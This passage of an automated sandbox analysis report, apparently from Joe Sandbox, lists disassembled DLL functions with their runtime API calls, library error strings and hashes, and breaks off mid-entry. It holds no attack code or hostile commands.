                                                                                          • Opcode ID: 74827ac2825510f8c19be5c1db895d6c18af6f07f8e8e3881e50c9c68bf7e65c
                                                                                          • Instruction ID: f2be7bcd0817b95b2d436e029a878beca1712ade800ae516308579c807f49f26
                                                                                          • Opcode Fuzzy Hash: 74827ac2825510f8c19be5c1db895d6c18af6f07f8e8e3881e50c9c68bf7e65c
                                                                                          • Instruction Fuzzy Hash: 82414A752087809FD314CF28C880B5BBBE8FF9D614F508A1DF59997391EB30A9048B92
                                                                                          Function 6D004100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004175
                                                                                          • _memmove.LIBCMT ref: 6D0041C6
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: string too long
                                                                                          • API String ID: 2168136238-2556327735
                                                                                          • Opcode ID: 9404d0726d62118caa4498dd45808aa12ab4d028ae6d90b6f7694a033312cb6f
                                                                                          • Instruction ID: 656c76449c483ae8e08bb19fdcd7de91b1e519846356e60434797b5d4549ece7
                                                                                          • Opcode Fuzzy Hash: 9404d0726d62118caa4498dd45808aa12ab4d028ae6d90b6f7694a033312cb6f
                                                                                          • Instruction Fuzzy Hash: 2431A1323146107BF7219E5CEC80BAAF7EDEBBD764B60492BE591C7680C761DC4087A5
                                                                                          Function 6D03C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D03C39B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: gfff$gfff
                                                                                          • API String ID: 2005118841-3084402119
                                                                                          • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                          • Instruction ID: 73cd85e0fa9861f4fe6e75c44169765f62f9e30141db5f7cfee3e39de0dbeb05
                                                                                          • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                          • Instruction Fuzzy Hash: 6C31727190461EAFD714CF98D980FBEB7B9EB84318F45811CE915D7284D730BA15CBA1
                                                                                          Function 6D0018C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D00194F
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::exception::exception.LIBCMT ref: 6D00198E
                                                                                            • Part of subcall function 6D0695C1: std::exception::operator=.LIBCMT ref: 6D0695DA
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          Strings
                                                                                          • Clone() is not implemented yet., xrefs: 6D0018ED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                          • String ID: Clone() is not implemented yet.
                                                                                          • API String ID: 2192554526-226299721
                                                                                          • Opcode ID: 1c274e7e1a0ca3e80b27e97f25e1c09a2aabc0c543375a6b5df3308536694209
                                                                                          • Instruction ID: c9bb8c1f2cd63e7f7ed37f368507cd175464446b7dacec73de8d51d987154c15
                                                                                          • Opcode Fuzzy Hash: 1c274e7e1a0ca3e80b27e97f25e1c09a2aabc0c543375a6b5df3308536694209
                                                                                          • Instruction Fuzzy Hash: 8B316071808248BFEB14CF99D840BEEFFB8FB19324F10462EE525A7681D7749504CBA0
                                                                                          Function 6D035560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D035657
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • InputBuffer, xrefs: 6D0355BF
                                                                                          • StringStore: missing InputBuffer argument, xrefs: 6D0355E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                          • API String ID: 3718517217-2380213735
                                                                                          • Opcode ID: 1c156294a26ef270050afd17303d8ea0bc0d459e24c9b5cb5c937717f1d296eb
                                                                                          • Instruction ID: 789829f8d3224bb055b0a954c4723ccaf195d378e5885221bc07b9894c2308eb
                                                                                          • Opcode Fuzzy Hash: 1c156294a26ef270050afd17303d8ea0bc0d459e24c9b5cb5c937717f1d296eb
                                                                                          • Instruction Fuzzy Hash: 8F4135B150C7819FE320CF69D490B6BFBE4BB99714F448A1EF1A983291DB74D908CB52
                                                                                          Function 6D001EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D001F36
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::exception::exception.LIBCMT ref: 6D001F6E
                                                                                            • Part of subcall function 6D0695C1: std::exception::operator=.LIBCMT ref: 6D0695DA
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          Strings
                                                                                          • CryptoMaterial: this object does not support precomputation, xrefs: 6D001ED4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                          • String ID: CryptoMaterial: this object does not support precomputation
                                                                                          • API String ID: 2192554526-3625584042
                                                                                          • Opcode ID: 9054cbca20ef34eea77345b4114b2d45cf01f89d308d54dfe61abc7fa98ec06a
                                                                                          • Instruction ID: 885848ff15bf8199b161f46a220775406715c9b98d026d45635633b39dce4733
                                                                                          • Opcode Fuzzy Hash: 9054cbca20ef34eea77345b4114b2d45cf01f89d308d54dfe61abc7fa98ec06a
                                                                                          • Instruction Fuzzy Hash: 28316F71808248BFEB14CF99D840BAEFBB8FB09724F10866EE525A7781D7749504CB90
                                                                                          Function 6D013317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D013327
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D01336B
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1735018483-3788999226
                                                                                          • Opcode ID: 696eed7e7b2e6e9031cb5d557ef62004cb543bee8df2f833d121a9123d02d910
                                                                                          • Instruction ID: 3a6c988cf344e73ad1c1545e1cd5353f9de99fd5f71fdf7c627ded1c89c32564
                                                                                          • Opcode Fuzzy Hash: 696eed7e7b2e6e9031cb5d557ef62004cb543bee8df2f833d121a9123d02d910
                                                                                          • Instruction Fuzzy Hash: D4310579A086059FEB14CF98DC90B6EB3B0EB49314F16422DE9169B391DB31BD00CB95
                                                                                          Function 6D025810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D02584D
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • VariantClear.OLEAUT32(00000000), ref: 6D025899
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 2677079660-3788999226
                                                                                          • Opcode ID: 6a82736dfedbeec5f7a9d275d3c1aacce61277f70d75291ea2c46d6b4311e746
                                                                                          • Instruction ID: f2f322657a4b962cb5a10487ff5c014dd09517ecdde272673b47bbe358222da0
                                                                                          • Opcode Fuzzy Hash: 6a82736dfedbeec5f7a9d275d3c1aacce61277f70d75291ea2c46d6b4311e746
                                                                                          • Instruction Fuzzy Hash: 6B21B676A056059FE710CF68D884B7EB7F5FF48324F51462EE555E3780D770A9008B91
                                                                                          Function 6D015750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D01576B
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D015782
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                          • String ID: string too long
                                                                                          • API String ID: 963545896-2556327735
                                                                                          • Opcode ID: abcd262a5cdf386b19d1a2d7d4fda6ebdb36fc0b52e2c13ff89a8461428aaef6
                                                                                          • Instruction ID: 778b49e9de5e6b10f4efb50af933ca3223f40912d5464f27bd98713fe8b949ed
                                                                                          • Opcode Fuzzy Hash: abcd262a5cdf386b19d1a2d7d4fda6ebdb36fc0b52e2c13ff89a8461428aaef6
                                                                                          • Instruction Fuzzy Hash: 4411A53630C6119FF3219A9CBC81B7AF7FDEF95620B61071FE5528B681C761980483A1
                                                                                          Function 6D0046B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D0046C4
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D00470B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: string too long
                                                                                          • API String ID: 1785806476-2556327735
                                                                                          • Opcode ID: 7eb88d3f9407c8e85400fc190aab2e360e3626699466c2c05db926a7217ab742
                                                                                          • Instruction ID: 75d34ae6809d9585cf6a9f106e4d025b3b136b39063f5612fef4a1ce3a23f471
                                                                                          • Opcode Fuzzy Hash: 7eb88d3f9407c8e85400fc190aab2e360e3626699466c2c05db926a7217ab742
                                                                                          • Instruction Fuzzy Hash: F411B9761087117FF7209E78A8C0B7EB7A8AF69214F200A2ED59B83582D761E4488365
                                                                                          Function 6D034D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D034E00
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • ArraySink: missing OutputBuffer argument, xrefs: 6D034D91
                                                                                          • OutputBuffer, xrefs: 6D034D77
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                                                          • API String ID: 3718517217-3781944848
                                                                                          • Opcode ID: 528d7883aebf50bc285db52d975b3a444c5224586b885279d1502eff788764a9
                                                                                          • Instruction ID: 812609c1e8fb29648db4c8ac02c316a48cb50c58e84667757c66f20a74c9df2c
                                                                                          • Opcode Fuzzy Hash: 528d7883aebf50bc285db52d975b3a444c5224586b885279d1502eff788764a9
                                                                                          • Instruction Fuzzy Hash: 273105B550C780AFE310CF68C480B5AFBE4BB99714F408A1EF5A987391DB74D508CB52
                                                                                          Function 6D010150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D010201
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • StringSink: OutputStringPointer not specified, xrefs: 6D01019B
                                                                                          • OutputStringPointer, xrefs: 6D01018C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                                          • API String ID: 3718517217-1331214609
                                                                                          • Opcode ID: 7b884588275828c81e8d01c07ddc559fd4b34413a6a5bfca5ab71342d7fd8c24
                                                                                          • Instruction ID: ccbdcd3872b5b04420de896644469cc46cbd489eb4c66f8c88431378565468d4
